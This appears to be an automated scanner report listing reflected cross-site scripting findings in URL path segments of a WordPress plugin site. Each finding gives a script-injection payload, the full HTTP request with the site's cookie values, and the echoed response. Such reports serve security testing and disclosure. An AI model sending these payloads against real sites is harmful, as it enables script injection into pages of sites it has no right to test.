HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:01 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674581+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674582; expires=Thu, 02-Feb-2012 19:23:02 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:02 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53449
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d8eb"><script>alert(1)</script>9e15b3b1081 was submitted in the REST URL parameter 1. This input was echoed as 1d8eb\"><script>alert(1)</script>9e15b3b1081 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site1d8eb"><script>alert(1)</script>9e15b3b1081/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:22 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674542+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674542; expires=Thu, 02-Feb-2012 19:22:22 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:22 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a721"><script>alert(1)</script>4e05a494985 was submitted in the REST URL parameter 2. This input was echoed as 3a721\"><script>alert(1)</script>4e05a494985 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content3a721"><script>alert(1)</script>4e05a494985/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:23 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674544+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674544; expires=Thu, 02-Feb-2012 19:22:24 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:24 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53461
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24702"><script>alert(1)</script>57503f72f04 was submitted in the REST URL parameter 3. This input was echoed as 24702\"><script>alert(1)</script>57503f72f04 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins24702"><script>alert(1)</script>57503f72f04/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:25 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53461
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c140b"><script>alert(1)</script>1f6a60dc002 was submitted in the REST URL parameter 4. This input was echoed as c140b\"><script>alert(1)</script>1f6a60dc002 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-slimboxc140b"><script>alert(1)</script>1f6a60dc002/plugin-data/superslider/ssSlimbox/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:27 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674547+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674547; expires=Thu, 02-Feb-2012 19:22:27 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:27 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53461
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7c08"><script>alert(1)</script>ae9dcdd351a was submitted in the REST URL parameter 5. This input was echoed as d7c08\"><script>alert(1)</script>ae9dcdd351a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-slimbox/plugin-datad7c08"><script>alert(1)</script>ae9dcdd351a/superslider/ssSlimbox/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:28 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674549+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674549; expires=Thu, 02-Feb-2012 19:22:29 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:29 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53461
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c4ae"><script>alert(1)</script>c312e4104fa was submitted in the REST URL parameter 6. This input was echoed as 7c4ae\"><script>alert(1)</script>c312e4104fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-slimbox/plugin-data/superslider7c4ae"><script>alert(1)</script>c312e4104fa/ssSlimbox/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:30 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674551+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674551; expires=Thu, 02-Feb-2012 19:22:31 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:31 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53461
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3335"><script>alert(1)</script>80926a060b5 was submitted in the REST URL parameter 7. This input was echoed as c3335\"><script>alert(1)</script>80926a060b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimboxc3335"><script>alert(1)</script>80926a060b5/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:32 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674553+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674553; expires=Thu, 02-Feb-2012 19:22:33 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:33 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53461
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eca7"><script>alert(1)</script>5a311d7dae7 was submitted in the REST URL parameter 8. This input was echoed as 9eca7\"><script>alert(1)</script>5a311d7dae7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default9eca7"><script>alert(1)</script>5a311d7dae7/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:35 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674555+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674555; expires=Thu, 02-Feb-2012 19:22:35 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:35 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53461
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbe4c"><script>alert(1)</script>dc71eef9483 was submitted in the REST URL parameter 9. This input was echoed as fbe4c\"><script>alert(1)</script>dc71eef9483 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.cssfbe4c"><script>alert(1)</script>dc71eef9483 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:40 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674560+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674560; expires=Thu, 02-Feb-2012 19:22:40 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:40 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53461
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29fcf"><script>alert(1)</script>8b6006bf31 was submitted in the REST URL parameter 1. This input was echoed as 29fcf\"><script>alert(1)</script>8b6006bf31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site29fcf"><script>alert(1)</script>8b6006bf31/wp-content/plugins/superslider/js/zoomer.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:14 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674534+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674534; expires=Thu, 02-Feb-2012 19:22:14 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:14 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53311
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9adac"><script>alert(1)</script>8768e1887b4 was submitted in the REST URL parameter 2. This input was echoed as 9adac\"><script>alert(1)</script>8768e1887b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content9adac"><script>alert(1)</script>8768e1887b4/plugins/superslider/js/zoomer.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:15 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674535+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674535; expires=Thu, 02-Feb-2012 19:22:15 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:15 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53314
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e674"><script>alert(1)</script>394812d1f45 was submitted in the REST URL parameter 3. This input was echoed as 6e674\"><script>alert(1)</script>394812d1f45 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins6e674"><script>alert(1)</script>394812d1f45/superslider/js/zoomer.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:16 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674537+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674537; expires=Thu, 02-Feb-2012 19:22:17 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:17 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53314
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c560f"><script>alert(1)</script>35a04a94683 was submitted in the REST URL parameter 4. This input was echoed as c560f\"><script>alert(1)</script>35a04a94683 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/supersliderc560f"><script>alert(1)</script>35a04a94683/js/zoomer.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:22 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674543+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674543; expires=Thu, 02-Feb-2012 19:22:23 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:23 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53313
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c31b9"><script>alert(1)</script>7140731d2d5 was submitted in the REST URL parameter 5. This input was echoed as c31b9\"><script>alert(1)</script>7140731d2d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/jsc31b9"><script>alert(1)</script>7140731d2d5/zoomer.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:24 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674544+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674544; expires=Thu, 02-Feb-2012 19:22:24 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:24 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53314
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
